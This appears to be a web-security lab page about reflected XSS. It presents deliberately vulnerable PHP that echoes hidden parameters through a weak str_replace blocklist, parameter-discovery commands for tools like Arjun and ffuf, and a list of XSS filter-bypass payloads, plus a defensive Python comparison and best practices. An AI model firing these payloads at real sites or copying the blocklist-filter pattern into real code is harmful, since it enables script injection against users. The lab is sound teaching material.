Advanced Hidden Parameter XSS Lab

Discover multiple hidden parameters and bypass extensive encoding filters

Advanced Filtering Challenge

Lab Overview

This lab contains multiple hidden parameters with extensive filtering that blocks various encoding techniques. The visible form uses secure HTML encoding, but there are several hidden endpoints with advanced filtering.

Visible Challenge: Basic HTML encoding using htmlspecialchars() for both the first name and last name parameters.
Hidden Parameters: There are multiple hidden parameters that are not shown in the form. Use tools like Arjun to discover them!
  • id, cat, page, number, page_id, categoryid
Advanced Filter: Extensive string replacement that blocks multiple dangerous strings, case variations, and encoding attempts.
Blocked items include:
  • Keywords: script, alert, confirm, prompt, eval, img, svg, onfocus, ontoggle, onmousemove, onmouseover
  • Case Variations: Script, sCript, scRipt, scrIpt, scriPt, scripT, SCript, SCRipt, SCRIpt, SCRIPt, SCRIPT
  • Encoding Attempts: HTML entities, hex encoding, Unicode escapes, string concatenation, array notation
Filter method: str_replace($arr, '', $_GET['parameter']) with an extensive blocklist of 100+ items
Filter Complexity: Extensive Blocklist Filtering

Objective: Discover the hidden parameters and bypass the extensive filter to execute XSS.

Backend Source Code
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','details','ontoggle','onmousemove','onmouseover','script','Script','sCript','scRipt','scrIpt','scriPt','scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT','script','img','image','svg','onfocus', '"c"+"onfirm(1)">', '"co"+"nfirm(1)">', '"con"+"firm(1)">', '"conf"+"irm(1)">', '"confi"+"rm(1)">', '"confir"+"m(1)">', '"confirm"+"(1)">', '"c"+"o"+"n"+"f"+"i"+"r"+"m"+"(1)">', "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "alert(1)", "\u0061lert(1)", "a\u006cert(1)", "al\u0065rt(1)", "ale\u0072t(1)", "aler\u0074(1)", "\u0061\u006c\u0065\u0072\u0074(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "confirm(1)", "\u0063onfirm(1)", "c\u006fnfirm(1)", "co\u006efirm(1)", "con\u0066irm(1)", "conf\u0069rm(1)", "confi\u0072m(1)", "confir\u006d(1)", "\u0063\u006f\u006e\u0066\u0069\u0072\u006d(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "prompt(1)", "\u0070rompt(1)", "p\u0072ompt(1)", "pr\u006fmpt(1)", "pro\u006dpt(1)", "prom\u0070t(1)", "promp\u0074(1)", "\u0070\u0072\u006f\u006d\u0070\u0074(1)", "['ale'+'rt'](1)");
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Similar code for cat, page, number, page_id, categoryid
# use arjun tool to find hidden parameters
Test Input Forms

Challenge 1: HTML Encoding (Visible)
Both form fields (first name and last name) are reflected through htmlspecialchars() encoding.

Challenge 2: Hidden Parameters with Advanced Filtering
Hint: There are multiple parameter names not shown in the form. You need to discover them using parameter discovery tools.
Hidden parameters: id, cat, page, number, page_id, categoryid
These parameters use advanced filtering with an extensive blocklist.
Parameter Discovery & Bypass Techniques
Parameter Discovery Tools:
  • Arjun: arjun -u https://example.com
  • ParamSpider: python3 paramspider.py -d example.com
  • FFUF: ffuf -w wordlist.txt -u https://example.com?FUZZ=test
  • Manual testing: Try common parameter names like: id, page, view, search, q, s, item, product, cat, category, number, etc.
Bypass Techniques for Advanced Filter:
  • Alternative tags: Use <iframe>, <object>, <embed>
  • Alternative events: Use onload, onerror, onclick
  • Template literals: Use ${alert(1)} in certain contexts
  • Uncommon tags: Try <marquee>, <audio>, <video>
  • Alternative protocols: Use vbscript:, data: URIs
Security Implications

This lab demonstrates:

  • Multiple hidden parameters create complex attack surfaces
  • Even extensive blocklists can have bypasses
  • Blocklist-based filtering is inherently incomplete
  • Parameter discovery is critical for comprehensive security testing
  • Different parameters may have different security implementations
  • Complex filters can create a false sense of security
Best Practices

For secure web applications:

  • Use allowlist-based validation instead of blocklists
  • Implement context-aware output encoding
  • Use Content Security Policy (CSP) headers
  • Conduct thorough parameter discovery during testing
  • Document all API endpoints and parameters
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
  • Regularly update and test security controls
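As an added illustration (not part of the lab's own code): a Python port of the lab's str_replace() blocklist beside an htmlspecialchars()-style encoder, run over the payload strings listed on this page. It shows why the allowlist/encoding recommendation above matters: the blocklist strips keywords but leaves the tag structure in the reflected output, while context-aware encoding of the HTML body context removes it. BLOCKLIST is a trimmed subset of the PHP array, and the helper names (blocklist_filter, encode_for_html, opens_tag, audit) are mine.

```python
import html
import re

# Trimmed subset of the lab's PHP $arr, kept in the original order: PHP's
# str_replace() with an array applies each search in sequence, so order
# matters (once "alert" has been removed, the later "alert(1)" entries can
# never match; they are dead entries in the real list as well).
BLOCKLIST = [
    "details", "alert", "confirm", "prompt", "eval", "ontoggle", "onmousemove",
    "onmouseover", "script", "Script", "sCript", "SCRIPT", "img", "image", "svg",
    "onfocus", "alert(1)", "confirm(1)", "prompt(1)", r"\u0061lert(1)",
    "['ale'+'rt'](1)",
]

def blocklist_filter(value: str) -> str:
    """Port of: $re = str_replace($arr, '', $_GET['id']); echo $re;"""
    for needle in BLOCKLIST:
        value = value.replace(needle, "")
    return value

def encode_for_html(value: str) -> str:
    """Port of htmlspecialchars($v, ENT_QUOTES): & < > " ' become entities
    (Python emits &#x27; for the apostrophe where PHP emits &#039;).
    This is the right encoder only for the HTML body / quoted-attribute
    context the lab echoes into; JS, URL and CSS contexts need their own."""
    return html.escape(value, quote=True)

def opens_tag(output: str) -> bool:
    """Sink-side check: an unescaped '<' followed by a letter can still start
    a tag in the reflected output, whatever keywords were removed before."""
    return re.search(r"<[A-Za-z]", output) is not None

# Reflection samples taken from this page's payload list; they are only
# passed through both functions as strings, never rendered.
PAGE_PAYLOADS = [
    '<iframe src="javascript:alert(1)">',
    "<body onload=alert(1)>",
    "<input onfocus=alert(1) autofocus>",
    "<marquee onstart=alert(1)>",
    "<audio src=x onerror=alert(1)>",
]

def audit(payloads):
    """Per sample: (blocklist output, encoded output, tag survives blocklist?,
    tag survives encoding?)."""
    rows = []
    for p in payloads:
        b, e = blocklist_filter(p), encode_for_html(p)
        rows.append((b, e, opens_tag(b), opens_tag(e)))
    return rows

if __name__ == "__main__":
    for b, e, tag_b, tag_e in audit(PAGE_PAYLOADS):
        print(f"blocklist -> {b!r:45} opens tag: {tag_b}")
        print(f"encoded   -> {e!r:45} opens tag: {tag_e}")
```

Running it prints each pair side by side; every blocklist output still opens a tag, every encoded output does not, which is the concrete reason the lab's id/cat/page handlers should reflect through the same encoder the fname/lname branch already uses.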
Payload Examples for Advanced Filter
Alternative Tag Vectors:
  • <iframe src="javascript:alert(1)">
  • <object data="javascript:alert(1)">
  • <embed src="javascript:alert(1)">
  • <base href="javascript:alert(1)//">
  • <form action="javascript:alert(1)"><input type=submit>
Alternative Event Handlers:
  • <body onload=alert(1)>
  • <input onfocus=alert(1) autofocus>
  • <select onfocus=alert(1) autofocus>
  • <textarea onfocus=alert(1) autofocus>
  • <keygen onfocus=alert(1) autofocus>
Advanced Bypass Techniques:
  • <marquee onstart=alert(1)> - Marquee tag with onstart
  • <audio src=x onerror=alert(1)> - Audio tag
  • <video src=x onerror=alert(1)> - Video tag
  • <applet code="javascript:alert(1)"> - Applet tag
  • <isindex type=image src=1 onerror=alert(1)> - Isindex tag
  • <button onfocus=alert(1) autofocus> - Button with autofocus